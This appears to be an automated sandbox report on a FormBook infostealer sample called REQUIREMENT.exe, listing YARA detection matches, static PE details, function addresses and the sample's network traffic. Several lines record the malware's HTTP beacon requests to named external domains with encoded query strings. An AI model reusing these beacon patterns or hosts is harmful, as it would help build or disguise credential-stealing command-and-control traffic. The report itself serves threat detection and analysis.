Source: global traffic	HTTP traffic detected: GET /cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.alexanderorlandis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.78:443 -> 192.168.11.20:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49832 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.35242814301.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000D.00000002.37539395229.0000000004EB7000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.37529342478.0000000002A26000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.35248315859.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000015.00000000.35190394827.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Uses 32bit PE files

Source: REQUIREMENT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.35242814301.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.37539395229.0000000004EB7000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.37529342478.0000000002A26000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.35248315859.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000000.35190394827.0000000027517000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Detected potential crypto function

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_004016F9	1_2_004016F9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00401746	1_2_00401746
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_0040150A	1_2_0040150A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B2045	1_2_023B2045
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B76AD	1_2_023B76AD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BBBCC	1_2_023BBBCC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6035	1_2_023B6035
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6835	1_2_023B6835
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5E2B	1_2_023B5E2B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6029	1_2_023B6029
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6829	1_2_023B6829
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B681D	1_2_023B681D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B7A08	1_2_023B7A08
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6805	1_2_023B6805
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6479	1_2_023B6479
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6071	1_2_023B6071
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A75	1_2_023B6A75
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6269	1_2_023B6269
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A69	1_2_023B6A69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B646D	1_2_023B646D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6065	1_2_023B6065
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6059	1_2_023B6059
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B625D	1_2_023B625D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A5D	1_2_023B6A5D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA25C	1_2_023BA25C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B9A51	1_2_023B9A51
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6251	1_2_023B6251
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B684C	1_2_023B684C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6041	1_2_023B6041
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6841	1_2_023B6841
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA8BF	1_2_023BA8BF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B58A9	1_2_023B58A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B64A9	1_2_023B64A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6AA5	1_2_023B6AA5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A99	1_2_023B6A99
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B649D	1_2_023B649D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5A93	1_2_023B5A93
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6491	1_2_023B6491
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B628D	1_2_023B628D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A8D	1_2_023B6A8D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6281	1_2_023B6281
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6485	1_2_023B6485
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BAAF9	1_2_023BAAF9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EFD	1_2_023B5EFD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EE5	1_2_023B5EE5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ED9	1_2_023B5ED9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ECD	1_2_023B5ECD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EC3	1_2_023B5EC3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B673B	1_2_023B673B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B613D	1_2_023B613D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6935	1_2_023B6935
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6929	1_2_023B6929
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F11	1_2_023B5F11
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F15	1_2_023B5F15
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6179	1_2_023B6179
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B637D	1_2_023B637D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6769	1_2_023B6769
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B616D	1_2_023B616D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6365	1_2_023B6365
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B635B	1_2_023B635B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6959	1_2_023B6959
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B675D	1_2_023B675D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6751	1_2_023B6751
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6155	1_2_023B6155
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B694D	1_2_023B694D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6941	1_2_023B6941
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6745	1_2_023B6745
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65BD	1_2_023B65BD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65B1	1_2_023B65B1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6395	1_2_023B6395
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6389	1_2_023B6389
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B9D8D	1_2_023B9D8D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6185	1_2_023B6185
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BF5	1_2_023B6BF5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65E1	1_2_023B65E1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BDD	1_2_023B6BDD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BD1	1_2_023B6BD1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65D5	1_2_023B65D5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65C9	1_2_023B65C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B73C1	1_2_023B73C1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BC5	1_2_023B6BC5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA59ED2	3_2_1EA59ED2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA51FC6	3_2_1EA51FC6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FF63	3_2_1EA5FF63
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1FF40	3_2_1EA1FF40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA39C98	3_2_1EA39C98
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA27CE8	3_2_1EA27CE8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFCE0	3_2_1E9BFCE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3C60	3_2_1E9A3C60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A9DD0	3_2_1E9A9DD0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3FDF4	3_2_1EA3FDF4
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FD27	3_2_1EA5FD27
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA57D4C	3_2_1EA57D4C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FA89	3_2_1EA5FA89
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BFAA0	3_2_1E9BFAA0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9DDB19	3_2_1E9DDB19
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5FB2E	3_2_1EA5FB2E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA198B2	3_2_1EA198B2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA578F3	3_2_1EA578F3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA518DA	3_2_1EA518DA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A3800	3_2_1E9A3800
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA15870	3_2_1EA15870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F872	3_2_1EA5F872
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A9870	3_2_1E9A9870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BB870	3_2_1E9BB870
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9E59C0	3_2_1E9E59C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9699E8	3_2_1E9699E8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA136EC	3_2_1EA136EC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F6F6	3_2_1EA5F6F6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3D62C	3_2_1EA3D62C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA4D646	3_2_1EA4D646
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E961707	3_2_1E961707
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0D480	3_2_1EA0D480
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA575C6	3_2_1EA575C6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F5C9	3_2_1EA5F5C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98D2EC	3_2_1E98D2EC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5124C	3_2_1EA5124C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991380	3_2_1E991380
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5F330	3_2_1EA5F330
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D508C	3_2_1E9D508C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AB0D0	3_2_1E9AB0D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA570F1	3_2_1EA570F1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A51C0	3_2_1E9A51C0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BB1E0	3_2_1E9BB1E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98F113	3_2_1E98F113
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA3D130	3_2_1EA3D130
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9E717A	3_2_1E9E717A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA50EAD	3_2_1EA50EAD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E992EE8	3_2_1E992EE8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C0E50	3_2_1E9C0E50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9E2E48	3_2_1E9E2E48
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5EFBF	3_2_1EA5EFBF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A6FE0	3_2_1E9A6FE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9ACF00	3_2_1E9ACF00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B8CDF	3_2_1E9B8CDF
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA6ACEB	3_2_1EA6ACEB
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA1EC20	3_2_1EA1EC20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E990C12	3_2_1E990C12
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9AAC20	3_2_1E9AAC20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5EC60	3_2_1EA5EC60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA56C69	3_2_1EA56C69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B2DB0	3_2_1E9B2DB0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E99AD00	3_2_1E99AD00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A0D69	3_2_1E9A0D69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5CA13	3_2_1EA5CA13
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA5EA5B	3_2_1EA5EA5B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA14BC0	3_2_1EA14BC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A0B10	3_2_1E9A0B10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9B6882	3_2_1E9B6882
